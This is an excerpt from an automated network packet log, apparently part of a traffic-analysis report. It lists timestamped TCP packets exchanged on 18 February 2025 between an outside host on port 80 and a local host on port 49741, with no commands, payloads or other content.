                                                                                  Feb 18, 2025 08:07:30.578772068 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.578783989 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.578794003 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.578815937 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.578844070 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579056025 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579066992 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579077959 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579092979 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579104900 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579241991 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579252958 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579263926 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579273939 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579284906 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579287052 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579292059 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579303026 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579334021 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579349995 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579368114 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579380035 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.579406023 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579427958 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.579991102 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580039024 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580050945 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580063105 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580096960 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580113888 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580122948 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580133915 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580144882 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580161095 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580180883 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580199003 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580210924 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580233097 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580249071 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580257893 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580260992 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580274105 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.580286980 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580292940 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.580327034 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697177887 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697197914 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697220087 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697233915 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697237015 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697247028 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697259903 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697273016 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697273970 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697318077 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697355986 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697391987 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697410107 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697432041 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697444916 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697455883 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697472095 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697516918 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697516918 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697516918 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697657108 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697669029 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697690010 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697694063 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697702885 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697714090 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697715044 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697722912 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697729111 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697736979 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697756052 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697777033 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697918892 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697957993 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697959900 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.697971106 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.697993994 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698007107 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698122978 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698133945 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698156118 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698168039 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698168993 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698179960 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698184967 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698193073 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698204041 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698204994 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698218107 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698230982 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698247910 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698271036 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698617935 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698630095 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698642015 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698662996 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698678970 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698759079 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698771000 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698781967 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698797941 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698797941 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698812008 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698822975 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698828936 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698842049 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698842049 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698882103 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698925972 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698940039 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698951006 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698961973 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698965073 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.698972940 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698985100 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.698991060 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699013948 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699033976 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699717045 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699728966 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699739933 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699759960 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699759960 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699774981 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699781895 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699785948 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699799061 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699810028 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699815035 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699824095 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699830055 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699836969 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.699853897 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.699879885 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816637039 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816652060 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816663027 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816679955 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816687107 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816696882 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816705942 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816710949 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816750050 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816755056 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816772938 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816791058 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816817045 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816896915 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816920042 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816931009 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816932917 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816962957 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816970110 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.816981077 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.816998005 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817017078 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817028999 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817040920 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817065954 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817068100 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817122936 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817218065 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817233086 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817245007 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817259073 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817272902 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817287922 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817312002 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817325115 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817336082 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817348003 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817351103 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817362070 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817374945 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817383051 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817409992 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817648888 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817661047 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817677021 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817687988 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817692041 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817697048 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817706108 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817715883 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817723989 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817728043 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817744017 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817773104 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817802906 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817816019 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817828894 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817840099 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817840099 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817859888 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817862988 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817871094 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.817889929 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.817913055 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818181038 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818192959 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818205118 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818218946 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818234921 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818233967 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818275928 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818305016 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818319082 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818330050 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818341970 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818344116 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818362951 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818382978 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818386078 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818397045 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818429947 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818434000 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818447113 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.818475008 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.818500996 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.823920965 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.823955059 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.823966026 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.823966980 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.823981047 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824003935 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824011087 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824014902 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824042082 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824042082 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824071884 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824084044 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824099064 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824131966 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824165106 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824178934 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824191093 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824203968 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824245930 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824276924 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824290991 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824311018 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824337959 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824376106 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824387074 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824398994 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824412107 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824423075 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824445009 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824484110 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824495077 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824506044 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824517012 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824522018 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824529886 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824531078 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824562073 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824729919 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824743986 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.824770927 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.824784994 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943003893 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943027973 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943053961 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943067074 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943078995 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943083048 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943092108 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943104029 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943119049 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943151951 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943152905 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943182945 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943221092 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943232059 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943243980 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943254948 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943272114 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943272114 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943305969 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943352938 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943388939 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943393946 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943406105 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943427086 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943440914 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943523884 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943535089 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943548918 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943553925 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943563938 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943610907 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943645000 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943691015 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943696976 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943708897 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943728924 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943741083 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943850994 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943861961 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943872929 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943883896 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.943888903 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943900108 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.943917990 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944032907 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944046021 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944057941 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944067955 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944070101 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944093943 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944118023 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944127083 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944158077 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944169044 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944185972 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944205046 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944217920 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944232941 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944243908 CET8049741196.251.92.64192.168.2.6
                                                                                  Feb 18, 2025 08:07:30.944262028 CET4974180192.168.2.6196.251.92.64
                                                                                  Feb 18, 2025 08:07:30.944329977 CET4974180192.168.2.6196.251.92.64
